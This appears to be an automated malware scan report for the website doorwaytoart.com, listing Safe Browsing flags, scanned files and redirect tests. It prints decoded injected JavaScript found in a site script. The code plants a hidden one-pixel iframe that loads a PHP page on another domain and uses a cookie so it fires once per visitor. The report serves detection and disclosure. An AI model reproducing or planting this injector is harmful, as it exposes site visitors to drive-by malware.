Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=doorwaytoart.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.doorwaytoart.com/ | 200 OK Content-Length: 8433 Content-Type: text/html | clean |
http://www.doorwaytoart.com/js2flash.js | 200 OK Content-Length: 13474 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function AddVar(Chars) { return ("?v=" + String(Math.round(Math.random() * (Math.pow(10, Chars))))); } function FlashObject(URL, Width, Height, BgColor, Align, AllowCashe) { document.write("<object classid='clsid:d27cdb6e-ae6d-11cf-96b8-444553540000' codebase='http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=7,0,0,0' width='" + Width + "' height='" + Height + "' id='flash' align='" + Align + "'>" + "<param name='allowScr Decoded script: String String function zzzfff() { var zyty = document.createElement('iframe'); zyty.src = 'http://www.woodshedembroidery.com/admin/HfXv7DZy.php'; zyty.style.position = 'absolute'; zyty.style.border = '0'; zyty.style.height = '1px'; zyty.style.width = '1px'; zyty.style.left = '1px'; zyty.style.top = '1px'; if (!document.getElementById('zyty')) { document.write('<div id=\'zyty\'></div>'); docume ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) ); } if (navigator.cookieEnabled) { if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/'); zzzfff(); } } Antivirus reports:
| ||
http://www.doorwaytoart.com/test404page.js | 404 Not Found Content-Length: 430 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: doorwaytoart.com
Result:
GET / HTTP/1.1
Host: doorwaytoart.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: doorwaytoart.com
Referer: http://www.google.com/search?q=doorwaytoart.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: doorwaytoart.com
Referer: http://www.google.com/search?q=doorwaytoart.com
Result:
The result is similar to the first query. There are no suspicious redirects found.